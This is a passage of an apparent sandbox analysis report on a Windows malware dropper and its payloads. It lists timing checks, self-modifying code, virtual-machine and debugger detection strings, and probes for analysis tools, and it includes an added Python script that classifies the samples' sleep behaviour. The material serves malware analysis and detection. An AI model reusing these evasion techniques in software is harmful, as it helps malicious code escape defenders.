Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe RDTSC instruction interceptor: First address: 33AED1 second address: 33AF25 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xor dword ptr [esp], 0F974DB7h 0x0000000f or dx, A403h 0x00000014 push 00000003h 0x00000016 and si, 19F1h 0x0000001b push 00000000h 0x0000001d call 00007F5E8080F365h 0x00000022 mov dx, si 0x00000025 pop edx 0x00000026 push eax 0x00000027 mov dword ptr [ebp+122D297Bh], esi 0x0000002d pop edi 0x0000002e push 00000003h 0x00000030 mov dword ptr [ebp+122D3AA2h], ebx 0x00000036 push 87B75848h 0x0000003b jo 00007F5E8080F364h 0x00000041 pushad 0x00000042 push eax 0x00000043 push edx 0x00000044 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe RDTSC instruction interceptor: First address: 33AF25 second address: 33AF2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe RDTSC instruction interceptor: First address: 33AF2B second address: 33AF7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 add dword ptr [esp], 3848A7B8h 0x0000000c push 00000000h 0x0000000e push esi 0x0000000f call 00007F5E8080F358h 0x00000014 pop esi 0x00000015 mov dword ptr [esp+04h], esi 0x00000019 add dword ptr [esp+04h], 0000001Dh 0x00000021 inc esi 0x00000022 push esi 0x00000023 ret 0x00000024 pop esi 0x00000025 ret 0x00000026 movzx ecx, cx 0x00000029 lea ebx, dword ptr [ebp+1244FB97h] 0x0000002f mov dword ptr [ebp+122D2B84h], ecx 0x00000035 mov ch, F2h 0x00000037 xchg eax, ebx 0x00000038 push ecx 0x00000039 push eax 0x0000003a push edx 0x0000003b jmp 00007F5E8080F35Bh 0x00000040 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe RDTSC instruction interceptor: First address: 33B097 second address: 33B0A7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe RDTSC instruction interceptor: First address: 33B0A7 second address: 33B0AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe RDTSC instruction interceptor: First address: 33B0AC second address: 33B0CF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E810FCBADh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d jp 00007F5E810FCBB4h 0x00000013 push eax 0x00000014 push edx 0x00000015 jo 00007F5E810FCBA6h 0x0000001b rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe RDTSC instruction interceptor: First address: 33B0CF second address: 33B0FC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov eax, dword ptr [eax] 0x00000008 pushad 0x00000009 push ecx 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c pop ecx 0x0000000d jnc 00007F5E8080F35Ch 0x00000013 js 00007F5E8080F356h 0x00000019 popad 0x0000001a mov dword ptr [esp+04h], eax 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 jmp 00007F5E8080F35Ah 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: B5ECB9 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: B5EDB6 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: D845FD instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: 1BECB9 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: 1BEDB6 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: 3E45FD instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe Special instruction interceptor: First address: 427CAA instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe Special instruction interceptor: First address: 427DAD instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe Special instruction interceptor: First address: 5BD7FD instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe Special instruction interceptor: First address: 652DF2 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1019319001\b7c03317c9.exe Special instruction interceptor: First address: 12AC404 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1019319001\b7c03317c9.exe Special instruction interceptor: First address: 110B887 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1019319001\b7c03317c9.exe Special instruction interceptor: First address: 12B174C instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1019321001\322c3dce5b.exe Memory allocated: 2160000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\1019321001\322c3dce5b.exe Memory allocated: 2320000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\1019321001\322c3dce5b.exe Memory allocated: 2160000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\1019319001\b7c03317c9.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\AppData\Local\Temp\1019319001\b7c03317c9.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\AppData\Local\Temp\1019319001\b7c03317c9.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_054E07AB rdtsc 0_2_054E07AB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe Thread delayed: delay time: 180000
Source: C:\Users\user\AppData\Local\Temp\1019321001\322c3dce5b.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 1162
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 1095
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 1159
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 1133
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5430
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3162
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3957
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3280
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1293
Source: C:\Users\user\AppData\Local\Temp\1019315001\5f0a381314.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\main\7z.dll
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe API coverage: 5.2 %
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3220 Thread sleep time: -48024s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3912 Thread sleep count: 1162 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3912 Thread sleep time: -2325162s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7320 Thread sleep count: 272 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7320 Thread sleep time: -8160000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6100 Thread sleep count: 1095 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6100 Thread sleep time: -2191095s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 2912 Thread sleep count: 1159 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 2912 Thread sleep time: -2319159s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3020 Thread sleep count: 1133 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3020 Thread sleep time: -2267133s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5828 Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7952 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe TID: 6072 Thread sleep time: -240000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3524 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2472 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe TID: 5752 Thread sleep count: 247 > 30
Source: C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe TID: 5752 Thread sleep time: -7410000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe TID: 1820 Thread sleep time: -180000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe TID: 5752 Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1019321001\322c3dce5b.exe TID: 7140 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\PING.EXE Last function: Thread delayed
Source: C:\Windows\System32\PING.EXE Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe Last function: Thread delayed
Source: C:\Program Files\Windows Media Player\graph\graph.exe Last function: Thread delayed
Source: C:\Program Files\Windows Media Player\graph\graph.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\PING.EXE Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\file.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\1019317001\72f44ceb0a.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\1019319001\b7c03317c9.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\1019315001\5f0a381314.exe Code function: 6_2_0040367D GetFileAttributesW,SetLastError,FindFirstFileW,FindClose,CompareFileTime, 6_2_0040367D
Source: C:\Users\user\AppData\Local\Temp\1019315001\5f0a381314.exe Code function: 6_2_004031DC FindFirstFileW,SetFileAttributesW,lstrcmpW,lstrcmpW,SetFileAttributesW,DeleteFileW,FindNextFileW,FindClose,SetFileAttributesW,RemoveDirectoryW,??3@YAXPAX@Z,??3@YAXPAX@Z, 6_2_004031DC
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe Code function: 10_2_00C87978 FindFirstFileW,FindFirstFileW,free, 10_2_00C87978
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe Code function: 10_2_00C8881C free,free,GetLogicalDriveStringsW,GetLogicalDriveStringsW,free,free,free, 10_2_00C8881C
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe Code function: 10_2_00C8B5E0 GetSystemInfo, 10_2_00C8B5E0
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread delayed: delay time: 30000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe Thread delayed: delay time: 30000
Source: C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe Thread delayed: delay time: 180000
Source: C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe Thread delayed: delay time: 30000
Source: C:\Users\user\AppData\Local\Temp\1019321001\322c3dce5b.exe Thread delayed: delay time: 922337203685477
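The "TID ... Thread sleep time/count" entries earlier in this block and the "Thread delayed: delay time" entries just above record relative waits (NtDelayExecution-style timeouts; a negative value is a relative interval). The report labels them with an "s" suffix, but the magnitudes only make sense as milliseconds: "delay time: 30000" and "Thread sleep time: -30000s" report the same 30 s sleep, and 922337203685477 is 2^63 / 10^4, the largest relative 100 ns timeout expressed in ms, which is an INFINITE wait. Treat that unit reading as an assumption. The script below is an added example, not part of the report; it aggregates the lines per thread (eleven of them embedded as constructed sample input) and classifies each thread. The sum/count ratio is the interesting derived number: it shows skotes.exe running sleep loops with a fixed 2001 ms period (~1100 iterations each) plus one with a 30 s period, Gxtuum.exe a 30 s loop, and the powershell threads parked on INFINITE waits (the -3689348814741908 entry is exactly four of them), which reads more like worker threads blocked on an event than a sleep-based stall, so they deserve less weight than the loops.

```python
import re
from collections import defaultdict

# 2**63 // 10**4: the largest relative NT timeout (0x7FFFFFFFFFFFFFFF in 100 ns
# units) expressed in milliseconds, i.e. an INFINITE wait (unit is an assumption).
INFINITE_MS = 2**63 // 10**4          # 922337203685477
LONG_SLEEP_MS = 30_000                # the report's own ">= -30000" threshold

TID_RE = re.compile(
    r"^Source: (?P<src>.+?) TID: (?P<tid>\d+) Thread sleep (?P<kind>time|count): -?(?P<val>\d+)s?\b"
)
DELAY_RE = re.compile(r"^Source: (?P<src>.+?) Thread delayed: delay time: (?P<val>\d+)\b")

# Lines copied from this report (constructed subset for the example).
SAMPLE_LINES = [
    r"Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3220 Thread sleep time: -48024s >= -30000s",
    r"Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3912 Thread sleep count: 1162 > 30",
    r"Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3912 Thread sleep time: -2325162s >= -30000s",
    r"Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7320 Thread sleep count: 272 > 30",
    r"Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7320 Thread sleep time: -8160000s >= -30000s",
    r"Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5828 Thread sleep time: -3689348814741908s >= -30000s",
    r"Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7952 Thread sleep time: -922337203685477s >= -30000s",
    r"Source: C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe TID: 5752 Thread sleep count: 247 > 30",
    r"Source: C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe TID: 5752 Thread sleep time: -7410000s >= -30000s",
    r"Source: C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe Thread delayed: delay time: 180000",
    r"Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477",
]


def _basename(path):
    return path.rsplit("\\", 1)[-1]


def aggregate_sleeps(lines):
    """Sum sleep time and sleep count per (process, TID); collect plain delay values per process."""
    threads = defaultdict(lambda: {"total_ms": 0, "count": 0})
    delays = defaultdict(list)
    for line in lines:
        m = TID_RE.match(line)
        if m:
            key = (_basename(m["src"]), int(m["tid"]))
            field = "total_ms" if m["kind"] == "time" else "count"
            threads[key][field] += int(m["val"])
            continue
        m = DELAY_RE.match(line)
        if m:
            delays[_basename(m["src"])].append(int(m["val"]))
    return dict(threads), dict(delays)


def classify(total_ms, count):
    """Turn the raw sum/count into something an analyst can act on."""
    if total_ms and total_ms % INFINITE_MS == 0:
        # one or more INFINITE waits accumulated on this thread
        return {"kind": "infinite_wait", "waits": total_ms // INFINITE_MS}
    if count:
        # a loop: total / iterations gives the per-iteration sleep period
        return {"kind": "sleep_loop", "iterations": count,
                "interval_ms": round(total_ms / count, 1), "total_s": total_ms / 1000}
    return {"kind": "single_sleep", "total_s": total_ms / 1000,
            "long": total_ms >= LONG_SLEEP_MS}


def profile(lines):
    threads, delays = aggregate_sleeps(lines)
    verdicts = {f"{proc}:{tid}": classify(v["total_ms"], v["count"])
                for (proc, tid), v in threads.items()}
    return verdicts, delays


if __name__ == "__main__":
    verdicts, delays = profile(SAMPLE_LINES)
    for key, v in sorted(verdicts.items()):
        print(f"{key:24} {v}")
    print("plain delays (ms):", delays)
```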
Source: C:\Windows\System32\cmd.exe File opened: C:\Users\user\AppData\Local\Temp\
Source: C:\Windows\System32\cmd.exe File opened: C:\Users\user\AppData\Local\
Source: C:\Windows\System32\cmd.exe File opened: C:\Users\user\AppData\Local\Temp\main\
Source: C:\Windows\System32\cmd.exe File opened: C:\Users\user\AppData\
Source: C:\Windows\System32\cmd.exe File opened: C:\Users\user\
Source: C:\Windows\System32\cmd.exe File opened: C:\Users\user\AppData\Local\Temp\main\extracted
Source: skotes.exe, skotes.exe, 00000005.00000002.2936910780.0000000000342000.00000040.00000001.01000000.00000007.sdmp, skotes.exe, 00000005.00000000.2263763833.0000000000342000.00000080.00000001.01000000.00000007.sdmp, b2885fa695.exe, 00000020.00000002.2760571894.000000000059E000.00000040.00000001.01000000.0000000E.sdmp, b7c03317c9.exe, 0000002A.00000002.2939183948.0000000001288000.00000040.00000001.01000000.00000014.sdmp, file.exe Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: PING.EXE, 00000032.00000002.2933675401.00000248C0388000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllZZ,sP
Source: b7c03317c9.exe, 0000002A.00000002.2930917753.0000000000F9D000.00000040.00000001.01000000.00000014.sdmp Binary or memory string: SYSTEM\ControlSet001\Services\VBoxSF
Source: 72f44ceb0a.exe, 00000024.00000003.2591584550.0000000001611000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: file.exe Binary or memory string: .vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: 4115805b10.exe, 00000027.00000002.2796654960.000002681092B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWp
Source: 4cdf81e042.exe, 0000002C.00000002.2937965345.000000000149D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWt
Source: skotes.exe, 00000005.00000002.2942570852.0000000000D47000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000005.00000002.2942570852.0000000000D79000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001F.00000002.2529597968.0000000001319000.00000004.00000020.00020000.00000000.sdmp, b2885fa695.exe, 00000020.00000003.2559195373.0000000000D2C000.00000004.00000020.00020000.00000000.sdmp, b2885fa695.exe, 00000020.00000003.2759950146.0000000000D2A000.00000004.00000020.00020000.00000000.sdmp, b2885fa695.exe, 00000020.00000002.2764183695.0000000000D2A000.00000004.00000020.00020000.00000000.sdmp, b2885fa695.exe, 00000020.00000002.2764183695.0000000000CFA000.00000004.00000020.00020000.00000000.sdmp, Gxtuum.exe, 00000026.00000002.2935835447.00000000015B3000.00000004.00000020.00020000.00000000.sdmp, Gxtuum.exe, 00000026.00000002.2935835447.00000000015E7000.00000004.00000020.00020000.00000000.sdmp, 4115805b10.exe, 00000027.00000002.2796654960.00000268109C0000.00000004.00000020.00020000.00000000.sdmp, 4115805b10.exe, 00000027.00000003.2753594593.00000268109C1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: explorer.exe, 0000001F.00000002.2529597968.0000000001319000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWf
Source: 72f44ceb0a.exe, 00000024.00000003.2594544795.00000000015A9000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: b7c03317c9.exe, 0000002A.00000002.2930917753.0000000000F9D000.00000040.00000001.01000000.00000014.sdmp Binary or memory string: SYSINTERNALSNum_processorNum_ramnameallfreedriversNum_displaysresolution_xresolution_y\*recent_filesprocessesuptime_minutesC:\Windows\System32\VBox*.dll01vbox_firstSYSTEM\ControlSet001\Services\VBoxSFvbox_secondC:\USERS\PUBLIC\public_checkWINDBG.EXEdbgwireshark.exeprocmon.exex64dbg.exeida.exedbg_secdbg_thirdyadroinstalled_appsSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallSOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall%d%s\%sDisplayNameapp_nameindexCreateToolhelp32Snapshot failed.
Source: file.exe, 00000000.00000002.1724592042.0000000000CE2000.00000040.00000001.01000000.00000003.sdmp, skotes.exe, 00000001.00000002.1754388426.0000000000342000.00000040.00000001.01000000.00000007.sdmp, skotes.exe, 00000005.00000002.2936910780.0000000000342000.00000040.00000001.01000000.00000007.sdmp, b2885fa695.exe, 00000020.00000002.2760571894.000000000059E000.00000040.00000001.01000000.0000000E.sdmp, b7c03317c9.exe, 0000002A.00000002.2939183948.0000000001288000.00000040.00000001.01000000.00000014.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: explorer.exe, 0000002F.00000002.2881532847.00000000006F9000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWA
Source: PING.EXE, 0000001D.00000002.2544952125.000001FB3D2AD000.00000004.00000020.00020000.00000000.sdmp, PING.EXE, 00000023.00000002.2564088029.000001B778368000.00000004.00000020.00020000.00000000.sdmp, b7c03317c9.exe, 0000002A.00000002.2943794217.0000000001EC7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: 4cdf81e042.exe, 0000002C.00000002.2937965345.0000000001476000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWH,K
Source: C:\Users\user\Desktop\file.exe System information queried: ModuleInformation
Source: C:\Users\user\Desktop\file.exe Process information queried: ProcessInformation

Anti Debugging

Source: C:\Users\user\Desktop\file.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1019319001\b7c03317c9.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 5_2_04CB003E Start: 04CB046B End: 04CB006B 5_2_04CB003E
Source: C:\Users\user\AppData\Local\Temp\1019319001\b7c03317c9.exe Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\1019319001\b7c03317c9.exe Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\1019319001\b7c03317c9.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\1019319001\b7c03317c9.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\1019319001\b7c03317c9.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\1019319001\b7c03317c9.exe Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\1019319001\b7c03317c9.exe Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\1019319001\b7c03317c9.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\1019319001\b7c03317c9.exe File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\1019319001\b7c03317c9.exe File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\1019319001\b7c03317c9.exe File opened: SIWVID
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort
Source: C:\Windows\explorer.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1019319001\b7c03317c9.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1019319001\b7c03317c9.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1019319001\b7c03317c9.exe Process queried: DebugPort
Source: C:\Windows\explorer.exe Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_054E07AB rdtsc 0_2_054E07AB
Source: C:\Users\user\AppData\Local\Temp\1019315001\5f0a381314.exe Code function: 6_2_00402665 LoadLibraryA,GetProcAddress,GetNativeSystemInfo, 6_2_00402665
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00B2652B mov eax, dword ptr fs:[00000030h] 0_2_00B2652B
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00B2A302 mov eax, dword ptr fs:[00000030h] 0_2_00B2A302
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 1_2_0018A302 mov eax, dword ptr fs:[00000030h] 1_2_0018A302
